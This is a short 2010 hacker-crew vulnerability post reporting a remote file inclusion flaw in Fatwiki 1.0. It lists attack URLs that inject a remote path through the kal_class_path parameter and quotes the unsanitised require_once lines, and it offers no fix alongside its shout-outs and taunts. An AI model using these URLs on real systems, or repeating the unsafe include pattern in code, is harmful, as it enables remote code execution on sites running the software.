Fatwiki Remote FiLe include
###########################################
## Fatwiki (fwiki) Remote FiLe include ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 10 januari, 2010 ##
###########################################
[ Software Information ]
[+] Vendor : http://galupki.de/
[+] Download : http://galupki.de/zip/fwiki_10b.zip
[+] version : 1.0
[+] Vulnerability : RFI
[+] Dork : syalalala
[+] LOCATION : INDONESIA – JOGJA
###########################################
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/datumscalc.php?kal_class_path=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/monatsblatt.php?kal_class_path=[INDONESIANCODER]
[ BUG ]
[!] datumscalc.php
– require_once(“$kal_class_path/kalender.class.php”);
– require_once(“$kal_class_path/feiertage.class.php”);
– require_once(“$kal_class_path/sonnemond.class.php”);
[!] monatsblatt.php
– require_once(“$kal_class_path/kalender.class.php”);
– require_once(“$kal_class_path/feiertage.class.php”);
– require_once(“$kal_class_path/sonnemond.class.php”);
– require_once(“$kal_class_path/minikal.php”);
[ FIX ]
dunno :”>
###########################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,gonzhack ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Babe enyak adek i love u pull dah ..
[+] to someone u will be p0wned :P
[+] Tukulesto : kapan keliling kota lagi ?? hahaha
[+] gonzhack : semoga balikan ya s0b .. ane dukung ..
[+] cimpli : janganlah bermimpi tentang menikahi Maria Ozawa .. hahahhah
[ QUOTE ]
[+] we are not dead .. INDONESIANCODER still r0x !
[+] nothing secure ..